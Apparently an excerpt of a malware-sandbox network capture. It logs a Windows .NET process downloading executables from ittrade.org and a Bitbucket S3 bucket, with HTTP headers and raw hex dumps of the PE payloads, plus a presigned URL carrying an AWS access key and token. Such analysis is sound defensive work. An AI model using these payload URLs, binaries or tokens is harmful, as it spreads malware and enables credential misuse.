                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: a3 00 55 85 00 89 35 f8 54 85 00 3b c2 73 36 83 c0 05 83 48 fb ff 66 c7 40 ff 00 0a 89 48 03 66 c7 40 1f 00 0a c6 40 21 0a 89 48 33 88 48 2f 8b 35 00 55 85 00 83 c0 40 8d 50 fb 81 c6 00 08 00 00 3b d6 72 cd 53 57 66 39 4d e6 0f 84 0e 01 00 00 8b 45 e8 3b c1 0f 84 03 01 00 00 8b 18 83 c0 04 89 45 fc 03 c3 be 00 08 00 00 89 45 f8 3b de 7c 02 8b de 39 1d f8 54 85 00 7d 6b bf 04 55 85 00 6a 40 6a 20 e8 52 f1 ff ff 59 59 85 c0 74 51 83 05 f8 54 85 00 20 8d 88 00 08 00 00 89 07 3b c1 73 31 83 c0 05 83 48 fb ff 83 60 03 00 80 60 1f 80 83 60 33 00 66 c7 40 ff 00 0a 66 c7 40 20 0a 0a c6 40 2f 00 8b 0f 83 c0 40 03 ce 8d 50 fb 3b d1 72 d2 83 c7 04 39 1d f8 54 85 00 7c a2 eb 06 8b 1d f8 54 85 00 33 ff 85 db 7e 72 8b 45 f8 8b 00 83 f8 ff 74 5c 83 f8 fe 74 57 8b 4d fc
                                                                                                                                                                                                                                                            Data Ascii: U5T;s6Hf@Hf@@!H3H/5U@P;rSWf9ME;EE;|9T}kUj@j RYYtQT ;s1H```3f@f@ @/@P;r9T|T3~rEt\tWM
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 68 54 bc 40 00 ff 15 bc b0 40 00 8b f8 85 ff 75 09 e8 34 fd ff ff 33 c0 5f c3 56 8b 35 b8 b0 40 00 68 90 bc 40 00 57 ff d6 68 84 bc 40 00 57 a3 2c f9 80 00 ff d6 68 78 bc 40 00 57 a3 30 f9 80 00 ff d6 68 70 bc 40 00 57 a3 34 f9 80 00 ff d6 83 3d 2c f9 80 00 00 8b 35 f0 b0 40 00 a3 38 f9 80 00 74 16 83 3d 30 f9 80 00 00 74 0d 83 3d 34 f9 80 00 00 74 04 85 c0 75 24 a1 ec b0 40 00 a3 30 f9 80 00 a1 f4 b0 40 00 c7 05 2c f9 80 00 82 26 40 00 89 35 34 f9 80 00 a3 38 f9 80 00 ff 15 e8 b0 40 00 a3 c4 d1 80 00 83 f8 ff 0f 84 c1 00 00 00 ff 35 30 f9 80 00 50 ff d6 85 c0 0f 84 b0 00 00 00 e8 dd ec ff ff ff 35 2c f9 80 00 8b 35 88 b0 40 00 ff d6 ff 35 30 f9 80 00 a3 2c f9 80 00 ff d6 ff 35 34 f9 80 00 a3 30 f9 80 00 ff d6 ff 35 38 f9 80 00 a3 34 f9 80 00 ff d6 a3 38
                                                                                                                                                                                                                                                            Data Ascii: hT@@u43_V5@h@Wh@W,hx@W0hp@W4=,5@8t=0t=4tu$@0@,&@548@50P5,5@50,5405848
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: ff 15 1c b1 40 00 5e 5d c3 6a 08 68 50 bf 80 00 e8 cd ea ff ff e8 41 f9 ff ff 8b 40 78 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 a0 17 00 00 e8 e6 ea ff ff c3 68 d7 2e 40 00 ff 15 88 b0 40 00 a3 90 fa 80 00 c3 8b ff 55 8b ec 8b 45 08 a3 94 fa 80 00 a3 98 fa 80 00 a3 9c fa 80 00 a3 a0 fa 80 00 5d c3 8b ff 55 8b ec 8b 45 08 8b 0d 4c bc 40 00 56 39 50 04 74 0f 8b f1 6b f6 0c 03 75 08 83 c0 0c 3b c6 72 ec 6b c9 0c 03 4d 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 5d c3 ff 35 9c fa 80 00 ff 15 8c b0 40 00 c3 6a 20 68 70 bf 80 00 e8 21 ea ff ff 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4b 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 59 2b c1 75 43 e8 f5 f7 ff ff 8b f8 89 7d d8 85 ff 75 14 83 c8 ff e9 54 01 00 00 be
                                                                                                                                                                                                                                                            Data Ascii: @^]jhPA@xte3@eEh.@@UE]UEL@V9Ptku;rkM^;s9Pt3]5@j hp!3}}]KtjY+t"+t+tY+uC}uT
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 32 84 e4 74 24 a9 00 00 ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8b ff 55 8b ec 83 ec 24 a1 04 d0 80 00 33 c5 89 45 fc 8b 45 08 53 89 45 e0 8b 45 0c 56 57 89 45 e4 e8 a8 f1 ff ff 83 65 ec 00 83 3d b0 fa 80 00 00 89 45 e8 75 7d 68 00 bd 40 00 ff 15 20 b0 40 00 8b d8 85 db 0f 84 10 01 00 00 8b 3d b8 b0 40 00 68 f4 bc 40 00 53 ff d7 85 c0 0f 84 fa 00 00 00 8b 35 88 b0 40 00 50 ff d6 68 e4 bc 40 00 53 a3 b0 fa 80 00 ff d7 50 ff d6 68
                                                                                                                                                                                                                                                            Data Ascii: t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+U$3EESEEVWEe=Eu}h@ @=@h@S5@Ph@SPh
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 00 00 00 03 f0 03 f8 ff 24 95 90 39 40 00 8b ff a0 39 40 00 a8 39 40 00 b4 39 40 00 c8 39 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 2c 3b 40 00 8b ff f7 d9 ff 24 8d dc 3a 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 30 3a 40 00 ff 24 8d 2c 3b 40 00 90 40 3a 40 00 64 3a 40 00 8c 3a 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 2c 3b 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72
                                                                                                                                                                                                                                                            Data Ascii: $9@9@9@9@9@E^_E^_FGE^_IFGFGE^_t1|9u$r$,;@$:@Ir+$0:@$,;@@:@d:@:@F#Gr$,;@IF#GFGr


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            19192.168.2.555583172.67.177.13344344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC130OUTGET /26b626fea29015a9f24e07a08fa011e4/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
                                                                                                                                                                                                                                                            Host: ittrade.org
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC678INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:56 GMT
                                                                                                                                                                                                                                                            Content-Type: application/x-ms-dos-executable
                                                                                                                                                                                                                                                            Content-Length: 4283768
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Last-Modified: Sun, 10 Mar 2024 22:52:57 GMT
                                                                                                                                                                                                                                                            Cache-Control: max-age=14400
                                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                                            Age: 0
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gLcPmtDFkmnyN7MeQbgOzBaTEazb%2FkXNCir5OGLa7Fp92yvRiRDPZL7FBt3UEC7Ftgov3KWazJnc5kM0U601%2BCIdtTN5XPMLhocn4ZfT0wZVx72o%2BsUPtwGgEoA2ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 86282017ad3009f3-LAS
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC691INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a5 10 45 5e e1 71 2b 0d e1 71 2b 0d e1 71 2b 0d 8e 07 80 0d f5 71 2b 0d 8e 07 b5 0d f6 71 2b 0d 8e 07 81 0d b8 71 2b 0d e8 09 b8 0d e2 71 2b 0d e1 71 2a 0d ba 71 2b 0d 8e 07 84 0d e0 71 2b 0d 8e 07 b1 0d e0 71 2b 0d 8e 07 b6 0d e0 71 2b 0d 52 69 63 68 e1 71 2b 0d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 2b 84 4d 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 96 00
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$E^q+q+q+q+q+q+q+q*q+q+q+q+Richq+PEL+Mc
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 8c 0d a4 ee 80 00 66 8c 1d 80 ee 80 00 66 8c 05 7c ee 80 00 66 8c 25 78 ee 80 00 66 8c 2d 74 ee 80 00 9c 8f 05 a8 ee 80 00 8b 45 00 a3 9c ee 80 00 8b 45 04 a3 a0 ee 80 00 8d 45 08 a3 ac ee 80 00 8b 85 e0 fc ff ff c7 05 e8 ed 80 00 01 00 01 00 a1 a0 ee 80 00 a3 9c ed 80 00 c7 05 90 ed 80 00 09 04 00 c0 c7 05 94 ed 80 00 01 00 00 00 a1 04 d0 80 00 89 85 d8 fc ff ff a1 08 d0 80 00 89 85 dc fc ff ff ff 15 ac b0 40 00 a3 e0 ed 80 00 6a 01 e8 e5 16 00 00 59 6a 00 ff 15 a8 b0 40 00 68 90 b1 40 00 ff 15 6c b0 40 00 83 3d e0 ed 80 00 00 75 08 6a 01 e8 c1 16 00 00 59 68 09 04 00 c0 ff 15 a4 b0 40 00 50 ff 15 a0 b0 40 00 c9 c3 8b ff 55 8b ec 8b 45 08 33 c9 3b 04 cd 10 d0 80 00 74 13 41 83 f9 2d 72 f1 8d 48 ed 83 f9 11 77 0e 6a 0d 58 5d c3 8b 04 cd 14 d0 80 00 5d c3
                                                                                                                                                                                                                                                            Data Ascii: ff|f%xf-tEEE@jYj@h@l@=ujYh@P@UE3;tA-rHwjX]]
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 6a 01 ff 75 08 e8 99 fe ff ff 83 c4 0c 5d c3 6a 01 6a 00 6a 00 e8 89 fe ff ff 83 c4 0c c3 6a 01 6a 01 6a 00 e8 7a fe ff ff 83 c4 0c c3 8b ff 55 8b ec e8 4b 05 00 00 ff 75 08 e8 94 03 00 00 59 68 ff 00 00 00 e8 af ff ff ff cc 68 10 1a 40 00 64 ff 35 00 00 00 00 8b 44 24 10 89 6c 24 10 8d 6c 24 10 2b e0 53 56 57 a1 04 d0 80 00 31 45 fc 33 c5 50 89 65 e8 ff 75 f8 8b 45 fc c7 45 fc fe ff ff ff 89 45 f8 8d 45 f0 64 a3 00 00 00 00 c3 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5f 5e 5b 8b e5 5d 51 c3 cc cc cc cc cc cc cc 8b ff 55 8b ec 83 ec 18 53 8b 5d 0c 56 8b 73 08 33 35 04 d0 80 00 57 8b 06 c6 45 ff 00 c7 45 f4 01 00 00 00 8d 7b 10 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 b7 f5 ff ff 8b 4e 0c 8b 46 08 03 cf 33 0c 38 e8 a7 f5 ff ff 8b 45 08 f6 40 04 66 0f 85 19 01
                                                                                                                                                                                                                                                            Data Ascii: ju]jjjjjjzUKuYhh@d5D$l$l$+SVW1E3PeuEEEEdMdY__^[]QUS]Vs35WEE{tN38NF38E@f
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: ff 50 88 5d fb e8 58 15 00 00 59 50 8d 85 08 fe ff ff 50 56 ff 15 cc b0 40 00 8b 4d fc 5f 5e 33 cd 5b e8 1b f1 ff ff c9 c3 6a 03 e8 e9 18 00 00 59 83 f8 01 74 15 6a 03 e8 dc 18 00 00 59 85 c0 75 1f 83 3d 00 d0 80 00 01 75 16 68 fc 00 00 00 e8 25 fe ff ff 68 ff 00 00 00 e8 1b fe ff ff 59 59 c3 8b ff 55 8b ec 56 e8 85 08 00 00 8b f0 85 f6 0f 84 32 01 00 00 8b 4e 5c 8b 55 08 8b c1 57 39 10 74 0d 83 c0 0c 8d b9 90 00 00 00 3b c7 72 ef 81 c1 90 00 00 00 3b c1 73 04 39 10 74 02 33 c0 85 c0 74 07 8b 50 08 85 d2 75 07 33 c0 e9 f5 00 00 00 83 fa 05 75 0c 83 60 08 00 33 c0 40 e9 e4 00 00 00 83 fa 01 0f 84 d8 00 00 00 8b 4d 0c 53 8b 5e 60 89 4e 60 8b 48 04 83 f9 08 0f 85 b6 00 00 00 6a 24 59 8b 7e 5c 83 64 39 08 00 83 c1 0c 81 f9 90 00 00 00 7c ed 8b 00 8b 7e 64 3d
                                                                                                                                                                                                                                                            Data Ascii: P]XYPPV@M_^3[jYtjYu=uh%hYYUV2N\UW9t;r;s9t3tPu3u`3@MS^`N`Hj$Y~\d9|~d=
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 90 00 08 00 00 a3 00 55 85 00 89 35 f8 54 85 00 3b c2 73 36 83 c0 05 83 48 fb ff 66 c7 40 ff 00 0a 89 48 03 66 c7 40 1f 00 0a c6 40 21 0a 89 48 33 88 48 2f 8b 35 00 55 85 00 83 c0 40 8d 50 fb 81 c6 00 08 00 00 3b d6 72 cd 53 57 66 39 4d e6 0f 84 0e 01 00 00 8b 45 e8 3b c1 0f 84 03 01 00 00 8b 18 83 c0 04 89 45 fc 03 c3 be 00 08 00 00 89 45 f8 3b de 7c 02 8b de 39 1d f8 54 85 00 7d 6b bf 04 55 85 00 6a 40 6a 20 e8 52 f1 ff ff 59 59 85 c0 74 51 83 05 f8 54 85 00 20 8d 88 00 08 00 00 89 07 3b c1 73 31 83 c0 05 83 48 fb ff 83 60 03 00 80 60 1f 80 83 60 33 00 66 c7 40 ff 00 0a 66 c7 40 20 0a 0a c6 40 2f 00 8b 0f 83 c0 40 03 ce 8d 50 fb 3b d1 72 d2 83 c7 04 39 1d f8 54 85 00 7c a2 eb 06 8b 1d f8 54 85 00 33 ff 85 db 7e 72 8b 45 f8 8b 00 83 f8 ff 74 5c 83 f8 fe
                                                                                                                                                                                                                                                            Data Ascii: U5T;s6Hf@Hf@@!H3H/5U@P;rSWf9ME;EE;|9T}kUj@j RYYtQT ;s1H```3f@f@ @/@P;r9T|T3~rEt\
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 59 c3 8b ff 57 68 54 bc 40 00 ff 15 bc b0 40 00 8b f8 85 ff 75 09 e8 34 fd ff ff 33 c0 5f c3 56 8b 35 b8 b0 40 00 68 90 bc 40 00 57 ff d6 68 84 bc 40 00 57 a3 2c f9 80 00 ff d6 68 78 bc 40 00 57 a3 30 f9 80 00 ff d6 68 70 bc 40 00 57 a3 34 f9 80 00 ff d6 83 3d 2c f9 80 00 00 8b 35 f0 b0 40 00 a3 38 f9 80 00 74 16 83 3d 30 f9 80 00 00 74 0d 83 3d 34 f9 80 00 00 74 04 85 c0 75 24 a1 ec b0 40 00 a3 30 f9 80 00 a1 f4 b0 40 00 c7 05 2c f9 80 00 82 26 40 00 89 35 34 f9 80 00 a3 38 f9 80 00 ff 15 e8 b0 40 00 a3 c4 d1 80 00 83 f8 ff 0f 84 c1 00 00 00 ff 35 30 f9 80 00 50 ff d6 85 c0 0f 84 b0 00 00 00 e8 dd ec ff ff ff 35 2c f9 80 00 8b 35 88 b0 40 00 ff d6 ff 35 30 f9 80 00 a3 2c f9 80 00 ff d6 ff 35 34 f9 80 00 a3 30 f9 80 00 ff d6 ff 35 38 f9 80 00 a3 34 f9 80
                                                                                                                                                                                                                                                            Data Ascii: YWhT@@u43_V5@h@Wh@W,hx@W0hp@W4=,5@8t=0t=4tu$@0@,&@548@50P5,5@50,540584
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: ff ff 59 ff 36 ff 15 1c b1 40 00 5e 5d c3 6a 08 68 50 bf 80 00 e8 cd ea ff ff e8 41 f9 ff ff 8b 40 78 85 c0 74 16 83 65 fc 00 ff d0 eb 07 33 c0 40 c3 8b 65 e8 c7 45 fc fe ff ff ff e8 a0 17 00 00 e8 e6 ea ff ff c3 68 d7 2e 40 00 ff 15 88 b0 40 00 a3 90 fa 80 00 c3 8b ff 55 8b ec 8b 45 08 a3 94 fa 80 00 a3 98 fa 80 00 a3 9c fa 80 00 a3 a0 fa 80 00 5d c3 8b ff 55 8b ec 8b 45 08 8b 0d 4c bc 40 00 56 39 50 04 74 0f 8b f1 6b f6 0c 03 75 08 83 c0 0c 3b c6 72 ec 6b c9 0c 03 4d 08 5e 3b c1 73 05 39 50 04 74 02 33 c0 5d c3 ff 35 9c fa 80 00 ff 15 8c b0 40 00 c3 6a 20 68 70 bf 80 00 e8 21 ea ff ff 33 ff 89 7d e4 89 7d d8 8b 5d 08 83 fb 0b 7f 4b 74 15 8b c3 6a 02 59 2b c1 74 22 2b c1 74 08 2b c1 74 59 2b c1 75 43 e8 f5 f7 ff ff 8b f8 89 7d d8 85 ff 75 14 83 c8 ff e9
                                                                                                                                                                                                                                                            Data Ascii: Y6@^]jhPA@xte3@eEh.@@UE]UEL@V9Ptku;rkM^;s9Pt3]5@j hp!3}}]KtjY+t"+t+tY+uC}u
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: 24 04 f7 c1 03 00 00 00 74 24 8a 01 83 c1 01 84 c0 74 4e f7 c1 03 00 00 00 75 ef 05 00 00 00 00 8d a4 24 00 00 00 00 8d a4 24 00 00 00 00 8b 01 ba ff fe fe 7e 03 d0 83 f0 ff 33 c2 83 c1 04 a9 00 01 01 81 74 e8 8b 41 fc 84 c0 74 32 84 e4 74 24 a9 00 00 ff 00 74 13 a9 00 00 00 ff 74 02 eb cd 8d 41 ff 8b 4c 24 04 2b c1 c3 8d 41 fe 8b 4c 24 04 2b c1 c3 8d 41 fd 8b 4c 24 04 2b c1 c3 8d 41 fc 8b 4c 24 04 2b c1 c3 8b ff 55 8b ec 83 ec 24 a1 04 d0 80 00 33 c5 89 45 fc 8b 45 08 53 89 45 e0 8b 45 0c 56 57 89 45 e4 e8 a8 f1 ff ff 83 65 ec 00 83 3d b0 fa 80 00 00 89 45 e8 75 7d 68 00 bd 40 00 ff 15 20 b0 40 00 8b d8 85 db 0f 84 10 01 00 00 8b 3d b8 b0 40 00 68 f4 bc 40 00 53 ff d7 85 c0 0f 84 fa 00 00 00 8b 35 88 b0 40 00 50 ff d6 68 e4 bc 40 00 53 a3 b0 fa 80 00 ff
                                                                                                                                                                                                                                                            Data Ascii: $t$tNu$$~3tAt2t$ttAL$+AL$+AL$+AL$+U$3EESEEVWEe=Eu}h@ @=@h@S5@Ph@S
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC1369INData Raw: fc 8d 04 8d 00 00 00 00 03 f0 03 f8 ff 24 95 90 39 40 00 8b ff a0 39 40 00 a8 39 40 00 b4 39 40 00 c8 39 40 00 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8b 45 08 5e 5f c9 c3 90 8a 06 88 07 8a 46 01 88 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 2c 3b 40 00 8b ff f7 d9 ff 24 8d dc 3a 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 30 3a 40 00 ff 24 8d 2c 3b 40 00 90 40 3a 40 00 64 3a 40 00 8c 3a 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 2c 3b 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef
                                                                                                                                                                                                                                                            Data Ascii: $9@9@9@9@9@E^_E^_FGE^_IFGFGE^_t1|9u$r$,;@$:@Ir+$0:@$,;@@:@d:@:@F#Gr$,;@IF#GFG


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            20192.168.2.55558252.217.234.5744344264C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2024-03-11 02:30:55 UTC1143OUTGET /fe3c402e-d650-43c9-b0ce-c95a11498dde/downloads/666d2627-f56a-4f04-99c5-36905368220f/a02.exe?response-content-disposition=attachment%3B%20filename%3D%22a02.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBZE7SCMA&Signature=HCpifs76QUiUci%2FEbjTZ%2FcagJHI%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBsaCXVzLWVhc3QtMSJHMEUCIAL7XL1t3TuPO88R%2FvmGOKGVl7p1Es82eho6cXvQ48VmAiEA7oowtGrg0V2iUhUFhl6H%2Ftflg%2F8yqqvEVz4QKWlhh9IqpwIIJBAAGgw5ODQ1MjUxMDExNDYiDFuIFyQ4tKa%2Be%2FeNTyqEAv3z8s9kfwkGDgSePx2WLCQQKhHTHvRODYsmqld%2BfnPf1j4E%2BbYhYHOLhh0iQz0sdVxhkrXPTKBqSsozj19VUfDopIPVTfRKMeNtRGQezfK2JjXbp8r7euC55noDSYZTIVM6KVVDIPF1tAGWJiFo6%2BMYnFfB2zug1t5HpisPVtMAStx8BqdelSlN37IFcwjn1aKq5iLKOG2ot6gDBMcne8C1p0SybdfD5uWEI6lrqrxtbWm19RY1WYFsJSDkbGmC0LCmMTNlAcqxgj5rGPqMkl4XffgOsPi8NIW0liFniEJ4GkgdiP0nldGzH%2BkY77zsgPaug81QSVfxWv673OeelwZ6wdBpMNTYua8GOp0B8L9l%2BRuxjpbF79wIHItOL1FbFFaPMDUqLn7BHl2kHWntZrPtX5IlaRgQbEYZGTx9IwOvskFyhN7gOZfzOo5jKzjap2b%2Bq12UXPXW48Biok56nWPXv6z27x4KbZddnlzzmD%2FmLERbURyUQwhok2kY3h9GfMX4MN0PiCzQ9hqyr2Z7uiRWWK82G8AlU01254WlEwld0nRAsugFGjj4nw%3D%3D&Expires=1710125916 HTTP/1.1
                                                                                                                                                                                                                                                            Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            x-amz-id-2: epcZFvoQignzDn7Ub4iDc8JQYc9tP7IRcDxrlQZUuwsgmn0jOpnyqpOLAL6Bqn8MXS6hj293QVE=
                                                                                                                                                                                                                                                            x-amz-request-id: J5BMW6PGSBD3QF3H
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:57 GMT
                                                                                                                                                                                                                                                            Last-Modified: Sat, 09 Mar 2024 01:51:54 GMT
                                                                                                                                                                                                                                                            ETag: "d9578a8e9ee343bc53b08fd8101f66e9"
                                                                                                                                                                                                                                                            x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                            x-amz-version-id: P5m1d1MT8MpyYgT1paykScDnj4a0CXh_
                                                                                                                                                                                                                                                            Content-Disposition: attachment; filename="a02.exe"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                                            Server: AmazonS3
                                                                                                                                                                                                                                                            Content-Length: 323584
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 08 61 dd 66 4c 00 b3 35 4c 00 b3 35 4c 00 b3 35 cf 08 ee 35 4e 00 b3 35 6b c6 ce 35 58 00 b3 35 6b c6 de 35 26 00 b3 35 6b c6 dd 35 60 00 b3 35 8f 0f ee 35 43 00 b3 35 4c 00 b2 35 cb 00 b3 35 6b c6 c1 35 4a 00 b3 35 6b c6 cb 35 4d 00 b3 35 52 69 63 68 4c 00 b3 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 3f be eb 65 00 00 00 00 00 00 00 00 e0 00 03
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$afL5L5L55N5k5X5k5&5k5`55C5L55k5J5k5M5RichL5PEL?e
                                                                                                                                                                                                                                                            2024-03-11 02:30:56 UTC488INData Raw: 47 01 8b 45 08 5e 5f c9 c3 8d 49 00 8a 06 88 07 8a 46 01 88 47 01 8a 46 02 88 47 02 8b 45 08 5e 5f c9 c3 90 8d 74 31 fc 8d 7c 39 fc f7 c7 03 00 00 00 75 24 c1 e9 02 83 e2 03 83 f9 08 72 0d fd f3 a5 fc ff 24 95 70 41 40 00 8b ff f7 d9 ff 24 8d 20 41 40 00 8d 49 00 8b c7 ba 03 00 00 00 83 f9 04 72 0c 83 e0 03 2b c8 ff 24 85 74 40 40 00 ff 24 8d 70 41 40 00 90 84 40 40 00 a8 40 40 00 d0 40 40 00 8a 46 03 23 d1 88 47 03 83 ee 01 c1 e9 02 83 ef 01 83 f9 08 72 b2 fd f3 a5 fc ff 24 95 70 41 40 00 8d 49 00 8a 46 03 23 d1 88 47 03 8a 46 02 c1 e9 02 88 47 02 83 ee 02 83 ef 02 83 f9 08 72 88 fd f3 a5 fc ff 24 95 70 41 40 00 90 8a 46 03 23 d1 88 47 03 8a 46 02 88 47 02 8a 46 01 c1 e9 02 88 47 01 83 ee 03 83 ef 03 83 f9 08 0f 82 56 ff ff ff fd f3 a5 fc ff 24 95 70 41
